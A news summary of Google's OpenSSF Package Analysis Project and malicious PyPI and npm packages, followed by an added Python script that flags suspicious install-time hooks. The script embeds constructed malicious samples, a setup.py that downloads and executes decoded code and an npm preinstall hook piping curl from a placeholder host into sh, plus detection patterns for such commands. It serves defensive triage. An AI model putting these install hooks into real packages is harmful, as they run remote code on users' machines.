"Open-Source Security: It's Too Easy to Upload 'Devastating' Malicious Packages, Warns Google"
Google has been working on finding malicious packages sneaked into open source software projects. The Open Source Security Foundation's (OpenSSF) Package Analysis Project aims to help automate the process of identifying malicious packages distributed on popular package repositories, such as PyPI for Python and npm for JavaScript. The initiative will provide data on the different types of malicious packages and help inform those who work on open source software about how to improve the security of the software supply chain.

Package repositories have limited resources to review the large number of daily updates, yet must maintain an open model in which anyone can contribute. Caleb Brown of Google's Open Source Security Team emphasizes that this has resulted in regular uploads of malicious packages to popular repositories, which can sometimes have devastating consequences for users. The Package Analysis Project identified over 200 malicious packages in one month. It discovered token theft attacks targeting Discord users that were distributed on PyPI and npm. One malicious PyPI package, for example, targeted the Discord Windows client: a backdoor downloaded from GitHub was installed into the Discord app to steal Discord tokens. In March, researchers found that developers using Microsoft's Azure cloud were being targeted with hundreds of malicious packages on npm.

This article continues to discuss the goals of the Package Analysis Project, the risks of software supply chain security in open source, and other efforts made to bolster supply chain security.
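The behaviour described above, a package that fetches and runs a payload from the network as a side effect of being installed, is one of the simplest things an automated reviewer can look for. The following is an added example of such a static triage check; it is not code from Google's or the OpenSSF Package Analysis Project, and both sample files (the setup.py and the package.json, with their example.invalid URLs) are constructed here for illustration. It flags top-level calls in a setup.py that reach the network, decode data or spawn processes, and npm lifecycle scripts that download or pipe into a shell.

```python
"""Static triage of install-time hooks in PyPI and npm packages.

Added example, not the Package Analysis Project's own code. The goal is to
prioritise packages for human review by spotting code that runs during
installation and fetches or executes something it did not ship with.
"""
from __future__ import annotations

import ast
import json
import re

# Constructed sample: a setup.py whose module-level code downloads a payload
# and executes it while `pip install` is evaluating the file.
SAMPLE_SETUP_PY = '''
import base64, urllib.request, subprocess
from setuptools import setup
data = urllib.request.urlopen("https://example.invalid/payload").read()
subprocess.call(["python", "-c", base64.b64decode(data)])
setup(name="totally-fine", version="0.1")
'''

# Constructed sample: an npm manifest whose preinstall hook pipes a remote
# script straight into a shell before the package is even unpacked.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "totally-fine",
    "version": "0.1.0",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/x.sh | sh",
        "test": "node test.js",
    },
})

# Call names that, in a setup.py, usually mean network access, decoding of
# hidden data, or process execution at install time. Coarse on purpose: this
# is a triage heuristic that ranks packages for review, not a verdict.
SUSPICIOUS_PY_CALLS = {
    "urlopen", "urlretrieve", "call", "run", "Popen",
    "system", "exec", "eval", "b64decode",
}

# npm runs these hooks automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Shell fragments that fetch remote content or evaluate code inline.
NETWORK_OR_SHELL = re.compile(r"(curl|wget|https?://|\|\s*(?:sh|bash)\b|node\s+-e)")


def triage_setup_py(source: str) -> list[tuple[int, str]]:
    """Return (line, call_name) for suspicious calls in a setup.py.

    Every top-level statement is walked, including function bodies, because
    custom cmdclass install commands also execute during installation.
    """
    findings: list[tuple[int, str]] = []
    for stmt in ast.parse(source).body:
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            func = node.func
            if isinstance(func, ast.Attribute):
                name = func.attr            # e.g. subprocess.call -> "call"
            else:
                name = getattr(func, "id", None)  # bare name, e.g. exec(...)
            if name in SUSPICIOUS_PY_CALLS:
                findings.append((node.lineno, name))
    return findings


def triage_package_json(manifest: str) -> list[tuple[str, str]]:
    """Return (hook, command) for lifecycle scripts that fetch or eval code."""
    scripts = json.loads(manifest).get("scripts", {})
    return [
        (hook, cmd)
        for hook, cmd in scripts.items()
        if hook in NPM_LIFECYCLE_HOOKS and NETWORK_OR_SHELL.search(cmd)
    ]


if __name__ == "__main__":
    for lineno, name in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py:{lineno}: install-time call to {name}()")
    for hook, cmd in triage_package_json(SAMPLE_PACKAGE_JSON):
        print(f"package.json: lifecycle hook '{hook}' runs: {cmd}")
```

The check deliberately ignores the ordinary `setup(...)` call and the `test` script, so a clean package produces no findings; anything it does report is a reason to open the package and read it, which is the manual step the Package Analysis Project is trying to make scarce reviewers spend only where it counts.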